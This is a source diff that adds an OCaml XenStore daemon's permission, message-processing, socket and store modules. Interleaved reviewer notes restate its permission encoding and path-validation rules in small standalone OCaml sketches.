+++ b/tools/xenstore/permission.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,111 @@
+(* 
+    Permissions for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type access =
+  | NONE
+  | READ
+  | WRITE
+  | BOTH
+
+type t =
+  {
+    access : access;
+    domain_id : int
+  }
+
+let make access domain_id =
+  {
+    access = access;
+    domain_id = domain_id
+  }
+
+let permission_of_string string =
+  {
+    access =
+      (match string.[0] with
+        | 'n' -> NONE
+        | 'r' -> READ
+        | 'w' -> WRITE
+        | 'b' -> BOTH
+        | _ -> raise (Constants.Xs_error (Constants.EINVAL, "permission_of_string", string)));
+    domain_id = int_of_string (String.sub string 1 (pred (String.length string)))
+  }
+
+let string_of_permission permission =
+  let perm_str =
+    match permission.access with
+    | NONE -> "n"
+    | READ -> "r"
+    | WRITE -> "w"
+    | BOTH -> "b" in
+  perm_str ^ (string_of_int permission.domain_id)
+
+let check_access access1 access2 =
+  match access1 with
+  | READ | WRITE -> access2 = access1 || access2 = BOTH
+  | _ -> access2 = access1
+
+let compare permission1 permission2 =
+  permission1.access = permission2.access && permission1.domain_id = permission2.domain_id
+
+let get_path path =
+  Store.root_path ^ ".permissions" ^ (if path = Store.root_path then Constants.null_string else path)
+
+class permissions =
+object(self)
+  method add (store : string Store.store) (path : string) (domain_id : int) =
+    let domain_id = if domain_id < 0 then 0 else domain_id
+    and parent_path = Store.parent_path path in
+    if not (store#node_exists (get_path parent_path)) then self#add store parent_path domain_id;
+    let parent_permissions = self#get store parent_path in
+    let new_permissions = if domain_id = 0 then parent_permissions else make (List.hd parent_permissions).access domain_id :: List.tl parent_permissions in
+    self#set (List.map string_of_permission new_permissions) store path
+  method check (store : string Store.store) path access domain_id =
+    let domain_id = if domain_id < 0 then 0 else domain_id
+    and permissions = self#get store path in
+    if domain_id = 0
+    then true
+    else
+      let default_permission = List.hd permissions
+      and actual_permissions = List.tl permissions in
+      if default_permission.domain_id = domain_id
+      then true
+      else check_access access (try (List.find (fun perm -> perm.domain_id = domain_id) actual_permissions).access with Not_found -> default_permission.access)
+  method get (store : string Store.store) (path : string) =
+    let ppath = get_path path in
+    match store#read_node ppath with
+    | Store.Value permissions | Store.Hack (permissions, _) -> List.map permission_of_string (Utils.split permissions)
+    | Store.Empty -> raise (Constants.Xs_error (Constants.EINVAL, "Permission.permissions#get", ppath))
+    | Store.Children _ ->
+        let parent_path = Store.parent_path path in
+        let parent_permissions = self#get store parent_path in
+        self#set (List.map string_of_permission parent_permissions) store path;
+        parent_permissions
+  method remove (store : string Store.store) path = store#remove_node (get_path path)
+  method set (permissions : string list) (store : string Store.store) (path : string) =
+    let ppath = get_path path in
+    let parent_path = Store.parent_path path in
+    if not (path = Store.root_path) && not (store#node_exists (get_path parent_path))
+    then (
+      let domain_id = (permission_of_string (List.hd permissions)).domain_id in
+      self#add store parent_path domain_id
+    );
+    ignore (try store#read_node ppath with _ -> store#create_node ppath; store#read_node ppath);
+    store#write_node ppath (Utils.combine_with_string permissions (String.make 1 Constants.null_char));
+end
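
Reviewer note on permission.ml: each permission is stored as one access letter (n, r, w, b) followed by a decimal domain ID, and a READ or WRITE request is also satisfied by BOTH. The following is a minimal standalone sketch of that encoding, not the patch's code. It assumes Invalid_argument as a stand-in for Constants.Xs_error (which is not shown in this part of the patch), and it adds an explicit length check that the original does not have.

```ocaml
(* Standalone sketch of the permission encoding in permission.ml.
   Assumption: Invalid_argument replaces Constants.Xs_error. *)
type access = NONE | READ | WRITE | BOTH

type t = { access : access; domain_id : int }

(* Parse strings such as "r5": access letter, then decimal domain ID. *)
let permission_of_string s =
  (* Extra guard, not in the patch: reject strings with no domain ID. *)
  if String.length s < 2 then invalid_arg "permission_of_string";
  let access =
    match s.[0] with
    | 'n' -> NONE
    | 'r' -> READ
    | 'w' -> WRITE
    | 'b' -> BOTH
    | _ -> invalid_arg "permission_of_string"
  in
  match int_of_string_opt (String.sub s 1 (String.length s - 1)) with
  | Some domain_id -> { access; domain_id }
  | None -> invalid_arg "permission_of_string"

(* Inverse of permission_of_string. *)
let string_of_permission p =
  let letter =
    match p.access with
    | NONE -> "n"
    | READ -> "r"
    | WRITE -> "w"
    | BOTH -> "b"
  in
  letter ^ string_of_int p.domain_id

(* A READ or WRITE request is granted by the same access or by BOTH;
   any other request must match exactly. *)
let check_access requested granted =
  match requested with
  | READ | WRITE -> granted = requested || granted = BOTH
  | _ -> granted = requested

let () =
  let p = permission_of_string "r5" in
  assert (p = { access = READ; domain_id = 5 });
  assert (string_of_permission p = "r5");
  assert (check_access READ BOTH);
  assert (not (check_access WRITE READ))
```
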
diff -r 10a8fae412c5 tools/xenstore/process.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/process.ml Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,412 @@
+(* 
+    Processing for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Check for a valid domain ID *)
+let check_domain_id domain_id =
+  try int_of_string domain_id >= 0 with _ -> false
+
+(* Check for a valid domain ID (only parameter) *)
+let check_domain_id_only payload =
+  let domain_id = List.hd (Utils.split payload) in
+  String.length domain_id = pred (String.length payload) && check_domain_id domain_id
+
+(* Check for 32-bit integer *)
+let check_int int =
+  try ignore (Int32.of_string int); true with _ -> false
+
+(* Check introduce *)
+let check_introduce payload =
+  let split = Utils.split payload in
+  let length = List.length split in
+  (length = 3 || length = 4) && check_domain_id (List.nth split 0) && check_int (List.nth split 1) && check_int (List.nth split 2)
+
+let rec check_chars path i =
+  if i >= String.length path
+  then true
+  else if not (String.contains Store.valid_characters path.[i])
+  then false
+  else check_chars path (succ i)
+
+(* Check for a valid path *)
+let check_path path =
+  if String.length path > 0
+  then
+    if path.[pred (String.length path)] <> Store.dividor
+    then
+      if not (Utils.strstr path "//")
+      then
+        if Store.is_relative path
+        then
+          if String.length path <= Constants.relative_path_max
+          then check_chars path 0
+          else false
+        else if String.sub path 0 (String.length Store.root_path) = Store.root_path
+        then
+          if String.length path <= Constants.absolute_path_max
+          then check_chars path 0
+          else false
+        else false
+      else false
+    else if path = Store.root_path then true else false
+  else false
+
+(* Check for a valid path (only parameter) *)
+let check_path_only payload =
+  let path = Utils.strip_null payload in
+  succ (String.length path) = String.length payload && check_path path
+
+let check_permissions payload =
+  let split = Utils.split payload in
+  let min_length = if payload.[pred (String.length payload)] = Constants.null_char then 2 else 3
+  and perm_list = if payload.[pred (String.length payload)] = Constants.null_char then List.tl split else Utils.remove_last (List.tl split) in
+  List.length split >= min_length && check_path (List.nth split 0) && List.fold_left (fun accum perm -> accum && (try ignore (Permission.permission_of_string perm); true with _ -> false)) true perm_list
+
+(* Check for a valid transaction end *)
+let check_transaction_end payload =
+  let value = Utils.strip_null payload in
+  succ (String.length value) = String.length payload && (value = Constants.payload_true || value = Constants.payload_false)
+
+(* Check for a valid transaction start *)
+let check_transaction_start payload =
+  String.length payload = 1 && payload.[0] = Constants.null_char
+
+(* Check for a valid watch path *)
+let check_watch_path path =
+  if Store.is_event path then check_chars path 0 else check_path path
+
+(* TODO: Check for a valid watch token *)
+let check_watch_token token =
+  true
+
+(* Check for a valid watch/unwatch *)
+let check_watch payload =
+  let split = Utils.split payload in
+  let length = List.length split in
+  (length = 2 || length = 3) && check_watch_path (List.nth split 0) && check_watch_token (List.nth split 1)
+
+let check_write payload =
+  let split = Utils.split payload in
+  let length = List.length split in
+  (length = 1 || length = 2) && check_path (List.nth split 0)
+
+(* Check a message to make sure the payload is valid *)
+let check message =
+  match message.Message.header.Message.message_type with
+  | Message.XS_DIRECTORY -> check_path_only message.Message.payload
+  | Message.XS_GET_DOMAIN_PATH -> check_path_only message.Message.payload
+  | Message.XS_GET_PERMS -> check_path_only message.Message.payload
+  | Message.XS_INTRODUCE -> check_introduce message.Message.payload
+  | Message.XS_IS_DOMAIN_INTRODUCED -> check_path_only message.Message.payload
+  | Message.XS_MKDIR -> check_path_only message.Message.payload
+  | Message.XS_READ -> check_path_only message.Message.payload
+  | Message.XS_RELEASE -> check_path_only message.Message.payload
+  | Message.XS_RESUME -> check_path_only message.Message.payload
+  | Message.XS_RM -> check_path_only message.Message.payload
+  | Message.XS_SET_PERMS -> check_permissions message.Message.payload
+  | Message.XS_TRANSACTION_END -> check_transaction_end message.Message.payload
+  | Message.XS_TRANSACTION_START -> check_transaction_start message.Message.payload
+  | Message.XS_UNWATCH -> check_watch message.Message.payload
+  | Message.XS_WATCH -> check_watch message.Message.payload
+  | Message.XS_WRITE -> check_write message.Message.payload
+  | _ -> false
+
+(* Return the list of parent paths that will be created for a given path *)
+let rec created_paths store path =
+  if store#node_exists path then [] else path :: created_paths store (Store.parent_path path)
+
+(* Return the list of child paths that will be deleted for a given path *)
+let rec removed_paths store path =
+  match store#read_node path with
+  | Store.Children children | Store.Hack (_, children) -> List.fold_left (fun paths child -> paths @ (removed_paths store child#path)) [] children
+  | _ -> [ path ]
+
+(* Process a directory message *)
+let process_directory domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in
+  try
+    if xenstored#permissions#check store path Permission.READ domain#id
+    then
+      let payload =
+        match store#read_node path with
+        | Store.Children (children) | Store.Hack (_, children) -> List.fold_left (fun children_string child -> if check_path child#path then children_string ^ (Utils.null_terminate (Store.base_path child#path)) else children_string) Constants.null_string children
+        | _ -> Constants.null_string in
+      domain#add_output_message (Message.reply message payload)
+    else domain#add_output_message (Message.error message Constants.EACCES)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno)
+
+(* Process a get domain path message *)
+let process_get_domain_path domain store message =
+  let domid = Utils.strip_null message.Message.payload in
+  let path = Utils.null_terminate (Store.domain_root ^ domid) in
+  domain#add_output_message (Message.reply message path)
+
+(* Process a get permissions message *)
+let process_get_perms domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in
+  if xenstored#permissions#check store path Permission.READ domain#id
+  then
+    let permissions = xenstored#permissions#get store path in
+    let payload = List.fold_left (fun permissions_string permission -> permissions_string ^ (Utils.null_terminate (Permission.string_of_permission permission))) Constants.null_string permissions in
+    domain#add_output_message (Message.reply message payload)
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process an introduce message *)
+let process_introduce domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let domid = List.nth split 0
+  and mfn = List.nth split 1
+  and port = List.nth split 2
+  and reserved = if List.length split = 4 then List.nth split 3 else Constants.null_string in
+  if not (Domain.is_unprivileged domain)
+  then (
+    (* XXX: Reserved value *)
+    if String.length reserved > 0 then ();
+    let domu = Domain.domu_init (int_of_string domid) (int_of_string port) (int_of_string mfn) false in
+    xenstored#add_domain domu;
+    xenstored#watches#fire_watches "@introduceDomain" (message.Message.header.Message.transaction_id <> 0l) false;
+    domain#add_output_message (Message.ack message)
+  )
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process an is-domain-introduced message *)
+let process_is_domain_introduced domain store xenstored message =
+  let domid = int_of_string (Utils.strip_null message.Message.payload) in
+  let domain_exists = try xenstored#domains#find_by_id domid; true with Not_found -> false in
+  let payload = Utils.null_terminate (if domid = Constants.domain_id_self || domain_exists then Constants.payload_true else Constants.payload_false) in
+  domain#add_output_message (Message.reply message payload)
+
+(* Process a mkdir message *)
+let process_mkdir domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null message.Message.payload)
+  and transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in
+  (* If permissions exist, node already exists *)
+  try
+    if xenstored#permissions#check store path Permission.WRITE domain#id
+    then domain#add_output_message (Message.ack message)
+    else domain#add_output_message (Message.error message Constants.EACCES)
+  with _ ->
+      try
+        if not (store#node_exists path)
+        then (
+          let paths = created_paths store path in
+          store#create_node path;
+          xenstored#permissions#add store path domain#id;
+          List.iter (fun path -> xenstored#domain_entry_incr store transaction path) paths;
+          if message.Message.header.Message.transaction_id = 0l
+          then (
+            xenstored#transactions#invalidate path;
+            xenstored#watches#fire_watches path false false
+          )
+        );
+        domain#add_output_message (Message.ack message)
+      with e -> raise e (*domain#add_output_message (Message.error message Constants.EINVAL)*)
+
+(* Process a read message *)
+let process_read domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in
+  try
+    if xenstored#permissions#check store path Permission.READ domain#id
+    then
+      let payload =
+        match store#read_node path with
+        | Store.Value value | Store.Hack (value, _) -> value
+        | _ -> Constants.null_string in
+      domain#add_output_message (Message.reply message payload)
+    else domain#add_output_message (Message.error message Constants.EACCES)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno)
+
+(* Process a release message *)
+let process_release domain store xenstored message =
+  if domain#id <= 0
+  then
+    let domu_id = int_of_string (Utils.strip_null message.Message.payload) in
+    try
+      xenstored#remove_domain (xenstored#domains#find_by_id domu_id);
+      if domu_id > 0 then xenstored#watches#fire_watches "@releaseDomain" false false;
+      domain#add_output_message (Message.ack message)
+    with Not_found -> domain#add_output_message (Message.error message Constants.ENOENT)
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a rm message *)
+let process_rm domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null message.Message.payload)
+  and transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in
+  try
+    if store#node_exists path
+    then
+      if xenstored#permissions#check store path Permission.WRITE domain#id
+      then
+        if path <> Store.root_path
+        then (
+          let paths = removed_paths store path in
+          List.iter (fun path -> xenstored#domain_entry_decr store transaction path) paths;
+          store#remove_node path;
+          xenstored#permissions#remove store path;
+          if message.Message.header.Message.transaction_id = 0l
+          then (
+            xenstored#transactions#invalidate path;
+            xenstored#watches#fire_watches path false true
+          );
+          domain#add_output_message (Message.ack message)
+        )
+        else domain#add_output_message (Message.error message Constants.EINVAL)
+      else domain#add_output_message (Message.error message Constants.EACCES)
+    else if store#node_exists (Store.parent_path path)
+    then
+      if xenstored#permissions#check store (Store.parent_path path) Permission.WRITE domain#id
+      then domain#add_output_message (Message.ack message)
+      else domain#add_output_message (Message.error message Constants.EACCES)
+    else domain#add_output_message (Message.error message Constants.ENOENT) (* XXX: This might be wrong *)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno)
+
+(* Process a set permissions message *)
+let process_set_perms domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = Store.canonicalise domain (List.hd split) in
+  let (permissions, reserved) =
+    if message.Message.payload.[pred (String.length message.Message.payload)] = Constants.null_char
+    then (List.tl split, Constants.null_string)
+    else (Utils.remove_last (List.tl split), List.nth split (pred (List.length split))) in
+  if xenstored#permissions#check store path Permission.WRITE domain#id
+  then (
+    (* XXX: Reserved value *)
+    if String.length reserved > 0 then ();
+    try
+      xenstored#permissions#set permissions store path;
+      xenstored#watches#fire_watches path (message.Message.header.Message.transaction_id <> 0l) false;
+      domain#add_output_message (Message.ack message)
+    with _ -> domain#add_output_message (Message.error message Constants.EACCES) (* XXX: errno? *)
+  )
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a transaction end message *)
+let process_transaction_end domain store xenstored message =
+  let transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in
+  if xenstored#transactions#exists transaction
+  then (
+    Trace.destroy domain#id "transaction";
+    if Utils.strip_null message.Message.payload = Constants.payload_true
+    then
+      if xenstored#commit transaction
+      then domain#add_output_message (Message.ack message)
+      else domain#add_output_message (Message.error message Constants.EAGAIN)
+    else domain#add_output_message (Message.ack message)
+  )
+  else domain#add_output_message (Message.error message Constants.ENOENT)
+
+(* Process a transaction start message *)
+let process_transaction_start domain store xenstored message =
+  try
+    if message.Message.header.Message.transaction_id = 0l
+    then
+      let transaction = xenstored#new_transaction domain store in
+      let payload = Utils.null_terminate (Int32.to_string transaction.Transaction.transaction_id) in
+      domain#add_output_message (Message.reply message payload)
+    else domain#add_output_message (Message.error message Constants.EBUSY)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno)
+
+(* Process an unwatch message *)
+let process_unwatch domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = List.nth split 0
+  and token = List.nth split 1
+  and reserved = if List.length split = 3 then List.nth split 2 else Constants.null_string in
+  let relative = Store.is_relative path in
+  let actual_path = if relative then Store.canonicalise domain path else path in
+  (* XXX: Reserved value *)
+  if String.length reserved > 0 then ();
+  if xenstored#watches#remove (Watch.make domain actual_path token relative)
+  then (
+    Trace.destroy domain#id "watch";
+    domain#add_output_message (Message.ack message)
+  )
+  else domain#add_output_message (Message.error message Constants.ENOENT)
+
+(* Process a watch message *)
+let process_watch domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = List.nth split 0
+  and token = List.nth split 1
+  and reserved = if List.length split = 3 then List.nth split 2 else Constants.null_string in
+  let relative = Store.is_relative path in
+  let actual_path = if relative then Store.canonicalise domain path else path in
+  (* XXX: Reserved value *)
+  if String.length reserved > 0 then ();
+  if xenstored#add_watch domain (Watch.make domain actual_path token relative)
+  then (
+    Trace.create domain#id "watch";
+    domain#add_output_message (Message.ack message);
+    domain#add_output_message (Message.event ((Utils.null_terminate path) ^ (Utils.null_terminate token)))
+  )
+  else domain#add_output_message (Message.error message Constants.EEXIST)
+
+(* Process a write message *)
+let process_write domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = Store.canonicalise domain (List.hd split)
+  and value = Utils.combine (List.tl split) in
+  let transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in
+  if not (store#node_exists path) || xenstored#permissions#check store path Permission.WRITE domain#id
+  then
+    if Domain.is_unprivileged domain && String.length value >= xenstored#options.Option.quota_max_entry_size
+    then domain#add_output_message (Message.error message Constants.ENOSPC)
+    else
+      try
+        if not (store#node_exists path)
+        then (
+          let paths = created_paths store path in
+          store#create_node path;
+          xenstored#permissions#add store path domain#id;
+          List.iter (fun path -> xenstored#domain_entry_incr store transaction path) paths
+        );
+        store#write_node path value;
+        if message.Message.header.Message.transaction_id = 0l
+        then (
+          xenstored#transactions#invalidate path;
+          xenstored#watches#fire_watches path false false
+        );
+        domain#add_output_message (Message.ack message)
+      with e -> raise e (*domain#add_output_message (Message.error message Constants.EINVAL)*) (* XXX: Wrong error? *)
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a message *)
+let process (xenstored : Xenstored.xenstored) domain =
+  let message = domain#input_message in
+  let store = xenstored#transactions#store (Transaction.make domain#id message.Message.header.Message.transaction_id) in
+  if check message
+  then (
+    match message.Message.header.Message.message_type with
+    | Message.XS_DIRECTORY -> process_directory domain store xenstored message
+    | Message.XS_GET_DOMAIN_PATH -> process_get_domain_path domain store message
+    | Message.XS_GET_PERMS -> process_get_perms domain store xenstored message
+    | Message.XS_INTRODUCE -> process_introduce domain store xenstored message
+    | Message.XS_IS_DOMAIN_INTRODUCED -> process_is_domain_introduced domain store xenstored message
+    | Message.XS_MKDIR -> process_mkdir domain store xenstored message
+    | Message.XS_READ -> process_read domain store xenstored message
+    | Message.XS_RELEASE -> process_release domain store xenstored message
+    | Message.XS_RM -> process_rm domain store xenstored message
+    | Message.XS_SET_PERMS -> process_set_perms domain store xenstored message
+    | Message.XS_TRANSACTION_END -> process_transaction_end domain store xenstored message
+    | Message.XS_TRANSACTION_START -> process_transaction_start domain store xenstored message
+    | Message.XS_UNWATCH -> process_unwatch domain store xenstored message
+    | Message.XS_WATCH -> process_watch domain store xenstored message
+    | Message.XS_WRITE -> process_write domain store xenstored message
+    | _ -> domain#add_output_message (Message.error message Constants.EINVAL)
+  )
+  else domain#add_output_message (Message.error message Constants.EINVAL)
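
Reviewer note on process.ml: the nested conditionals in check_path can be read as a flat conjunction of rules. The following is a minimal standalone sketch of the same rules as I read them, not the patch's code. The two length limits and the event character '@' are assumptions, since Constants is not shown in this part of the patch, and has_double_slash is a hypothetical local helper standing in for Utils.strstr path "//".

```ocaml
(* Assumed values: the patch reads these from Constants, not shown here. *)
let absolute_path_max = 3072
let relative_path_max = 2048
let event_char = '@'

(* Copied from store.ml in this patch. *)
let valid_characters =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/_@"

(* Hypothetical helper: true if the path contains "//". *)
let has_double_slash path =
  let n = String.length path in
  let rec go i =
    i + 1 < n && ((path.[i] = '/' && path.[i + 1] = '/') || go (i + 1))
  in
  go 0

(* True if every character is in valid_characters. *)
let all_valid path =
  let n = String.length path in
  let rec go i =
    i >= n || (String.contains valid_characters path.[i] && go (i + 1))
  in
  go 0

(* Flat restatement of check_path: the root is valid; otherwise the path
   must be non-empty, must not be an event path, must not end in '/',
   must not contain "//", must fit the limit for its kind, and must use
   only valid characters. *)
let check_path path =
  let n = String.length path in
  if n = 0 then false
  else if path = "/" then true
  else if path.[0] = event_char then false
  else
    let max_len =
      if path.[0] = '/' then absolute_path_max else relative_path_max
    in
    path.[n - 1] <> '/'
    && not (has_double_slash path)
    && n <= max_len
    && all_valid path

let () =
  assert (check_path "/");
  assert (check_path "/local/domain/0");
  assert (check_path "device/vbd");
  assert (not (check_path "/local//domain"));
  assert (not (check_path "/local/"));
  assert (not (check_path "@introduceDomain"))
```

Event paths are rejected here, as in the patch, because check_watch_path handles them separately with check_chars.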
diff -r 10a8fae412c5 tools/xenstore/socket.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/socket.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,46 @@
+(* 
+    Socket for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Convert an int to a file descriptor *)
+external file_descr_of_int : int -> Unix.file_descr = "%identity"
+
+(* Convert a file descriptor to an int *)
+let int_of_file_descr fd = (Obj.magic (fd: Unix.file_descr) : int)
+
+(* Socket interface *)
+class socket_interface fd can_write in_set out_set =
+object (self)
+  inherit Interface.interface as super
+  val m_fd = fd
+  val m_can_write = can_write
+  val m_in_set = in_set
+  val m_out_set = out_set
+  method private fd = m_fd
+  method private in_set = !m_in_set
+  method private out_set = !m_out_set
+  method can_read = List.mem self#fd self#in_set
+  method can_write = can_write
+  method destroy = Unix.close self#fd
+  method read buffer offset length =
+    let bytes_read = Unix.read self#fd buffer offset length in
+    if bytes_read = 0 && length <> 0
+    then raise (Constants.Xs_error (Constants.EIO, "socket_interface#read", "could not read data"))
+    else bytes_read
+  method write buffer offset length = Unix.write self#fd buffer offset (min length (String.length buffer))
+end
diff -r 10a8fae412c5 tools/xenstore/store.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/store.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,144 @@
+(* 
+    Store for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* XenStore node contents type *)
+type ('node, 'contents) node_contents =
+  | Empty
+  | Value of 'contents
+  | Children of 'node list
+  | Hack of 'contents * 'node list
+
+let dividor = '/'
+let dividor_str = String.make 1 dividor
+let root_path = dividor_str
+let domain_root = root_path ^ "local" ^ dividor_str ^ "domain" ^ dividor_str
+let valid_characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/_@"
+
+(* Return the base path of a path *)
+let base_path path =
+  if path = root_path
+  then path
+  else
+    let start = succ (String.rindex path dividor) in
+    String.sub path start ((String.length path) - start)
+
+(* Compare two nodes *)
+let compare node1 node2 =
+  String.compare node1#path node2#path
+
+(* Check if a path is a child of another path *)
+let is_child child parent =
+  if parent = root_path
+  then true
+  else
+    let length = min (String.length parent) (String.length child) in
+    if String.sub child 0 length <> String.sub parent 0 length
+    then false
+    else
+      let parent_length = String.length parent
+      and child_length = String.length child in
+      (* XXX: This returns child = parent *)
+      if parent_length = child_length
+      then true
+      else if parent_length < child_length then String.get child parent_length = dividor
+      else false
+
+(* Check if a path is an event path *)
+let is_event path =
+  path.[0] = Constants.event_char
+
+(* Check if a path is a relative path *)
+let is_relative path =
+  not (is_event path) && String.sub path 0 (String.length root_path) <> root_path
+
+(* Iterate over nodes applying function f to each node *)
+let rec iter f node =
+  match node#contents with
+  | Empty -> ()
+  | Children children -> List.iter (fun child -> iter f child) children
+  | Value value -> f value
+  | Hack (value, children) -> f value; List.iter (fun child -> iter f child) children
+
+(* Return the parent path of a path *)
+let parent_path path =
+  let slash = String.rindex path dividor in
+  if slash = 0 then root_path else String.sub path 0 slash
+
+(* Return canonicalised path *)
+let canonicalise domain path =
+  if not (is_relative path) then path else domain_root ^ (string_of_int domain#id) ^ dividor_str ^ path
+
+(* XenStore node type *)
+class ['contents] node path (contents : ('contents node, 'contents) node_contents) =
+object (self)
+  val m_path = path
+  val mutable m_contents = contents
+  method add_child child =
+    match self#contents with
+    | Empty -> m_contents <- Children [ child ]; true
+    | Value value -> m_contents <- Hack (value, [ child ]); true (* false *)
+    | Children children -> m_contents <- Children (List.sort compare (child :: children)); true
+    | Hack (value, children) -> m_contents <- Hack (value, List.sort compare (child :: children)); true
+  method contents = m_contents
+  method path = m_path
+  method get_child child_path =
+    match self#contents with
+    | Children children | Hack (_, children) -> (
+          try List.find (fun child_node -> child_node#path = child_path) children
+          with Not_found -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#get_child", child_path))
+        )
+    | _ -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#get_child", child_path))
+  method remove_child child_path =
+    match self#contents with
+    | Children children -> m_contents <- Children (List.filter (fun child_node -> child_node#path <> child_path) children)
+    | Hack (value, children) -> m_contents <- Hack (value, List.filter (fun child_node -> child_node#path <> child_path) children)
+    | _ -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#remove_child", path))
+  method set_contents contents = m_contents <- contents
+end
+
+class ['contents] store =
+object (self)
+  val m_root : 'contents node = new node root_path (Children [])
+  method private construct_node path =
+    let parent_path = parent_path path in
+    let parent_node = try self#get_node parent_path with _ -> self#construct_node parent_path
+    and node = new node path Empty in
+    if parent_node#add_child node then node else raise (Constants.Xs_error (Constants.ENOENT, "Store.store#construct_node", path))
+  method private get_node path = if path = root_path then self#root else (self#get_node (parent_path path))#get_child path
+  method private root = m_root
+  method create_node path = ignore (self#construct_node path)
+  method iter f = iter f self#root
+  method node_exists path = try ignore (self#get_node path); true with _ -> false
+  method read_node path = (self#get_node path)#contents
+  method remove_node path = (self#get_node (parent_path path))#remove_child path
+  method replace_node (node : 'contents node) =
+    let node_to_replace =
+      if node#path = root_path
+      then self#root
+      else (
+        if self#node_exists node#path then self#remove_node node#path;
+        self#construct_node node#path
+      ) in
+    node_to_replace#set_contents node#contents
+  method write_node path (contents : 'contents) =
+    let node = self#get_node path in
+    match node#contents with
+    | Empty | Value _ -> node#set_contents (Value contents)
+    | Children children | Hack (_, children) -> node#set_contents (Hack (contents, children))
+end
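The store class above walks the tree by repeatedly taking the parent of a path, so the behaviour of parent_path is worth seeing in isolation. The following is a minimal standalone sketch of that helper. The values of dividor and root_path are assumptions here (they are defined outside this part of the patch); '/' and "/" are guessed from the usual XenStore path layout.

```ocaml
(* Assumed definitions: the real ones live elsewhere in the patch. *)
let dividor = '/'
let root_path = "/"

(* Same logic as parent_path in the patch: cut at the last separator,
   and map anything directly under the root to the root itself. *)
let parent_path path =
  let slash = String.rindex path dividor in
  if slash = 0 then root_path else String.sub path 0 slash

let () =
  assert (parent_path "/local/domain/0" = "/local/domain");
  assert (parent_path "/local" = root_path);
  (* The root is its own parent, which is why get_node tests for
     root_path before recursing. *)
  assert (parent_path root_path = root_path)
```

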